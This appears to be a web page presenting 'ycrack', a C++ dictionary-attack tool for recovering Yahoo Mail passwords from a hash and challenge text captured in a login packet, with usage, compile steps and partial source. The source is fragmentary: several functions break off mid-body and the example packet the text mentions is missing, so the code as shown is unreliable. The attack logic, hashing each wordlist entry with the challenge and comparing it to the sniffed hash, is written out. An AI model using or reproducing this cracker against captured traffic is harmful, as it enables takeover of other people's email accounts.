ycrack is a dictionary attack tool designed specifically for testing the strength of Yahoo Mail passwords. You must know both the hashed password and the challenge text (both contained in the authentication packet sent to the server) in order to use the program.
Usage of the program is:
#./ycrack <hashed password> <challenge text> <word list file>
Below is an example login packet. Note the strings following 'challenge=' and 'passwd='; those are what you are looking for.
The file english_list.txt is the dictionary (text file with one word per line)
This program compiles on both Linux and Microsoft Windows platforms.
Tool's Source Code:
/* I'm not the best programmer, and I know this is a bit sloppy, but it works. Feel free to modify/optimize/do whatever you want
* with this code, just give me credit if it is due.
*
* Description:
* ycrack performs a dictionary attack on hashed Yahoo mail passwords. See the readme file for more information on Yahoo's
* implementation of the MD5 hashing algorithm. Standard MD5 functions are from RSA Data Security.
*
* Usage:
* #./ycrack <hashed password> <challenge text> <word list file>
*
* Compilation:
* Compiles on both Linux and Windows platforms (tested on Windows XP and Linux 2.4.21)
* #g++ ycrack.cpp -o ycrack
*
* Craig Heffner
* (03/06/05)
*/
/////////////////////////////////////////////////////////////////////////
//
// Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
// rights reserved.
//
// License to copy and use this software is granted provided that it
// is identified as the "RSA Data Security, Inc. MD5 Message-Digest
// Algorithm" in all material mentioning or referencing this software
// or this function.
// License is also granted to make and use derivative works provided
// that such works are identified as "derived from the RSA Data
// Security, Inc. MD5 Message-Digest Algorithm" in all material
// mentioning or referencing the derived work.
// RSA Data Security, Inc. makes no representations concerning either
// the merchantability of this software or the suitability of this
// software for any particular purpose. It is provided "as is"
// without express or implied warranty of any kind.
// These notices must be retained in any copies of any part of this
// documentation and/or software.
/////////////////////////////////////////////////////////////////////////
// MD5String: Performs the MD5 algorithm on a char* string, returning
// the results as a char*.
char* MD5String(char* szString)
{
int nLen = strlen(szString);
md5 alg;
// md5::Transform
// MD5 basic transformation. Transforms state based on block.
void md5::Transform (uchar* block)
{
uint4 a = m_State[0], b = m_State[1], c = m_State[2], d = m_State[3], x[16];
crypt=argv[1]; //password hash
challenge=argv[2]; //challenge text
file=argv[3]; //word file
FILE *f;
f=fopen(file,"r"); //open word list
if(!f){printf("\nError opening file %s\n",file);return 0;}
do{ //read each word into variable 'string'
c=fscanf(f,"%s",test);
string=test;
printf("Trying:%s\n",string);
hash1=MD5String(string); //get MD5 hash of the password
memcpy(&stuff[0],hash1,32); //copy the hashed password into stuff
memcpy(&stuff[32],challenge,28); //append challenge text onto the end of the password hash
memcpy(&stuff[60],"",3); //clear extra characters inserted by memcpy
hash2=MD5String(stuff); //calculate final hash
if(strcmp(crypt,hash2)==0){ //compare hash2 to the captured hash
printf("\nThe Yahoo password is: %s\n",string);
fclose(f);
return 0;}
}while(c!=EOF); //read until End Of File
fclose(f);
printf("\nPassword not found!\n");
return 0;
}
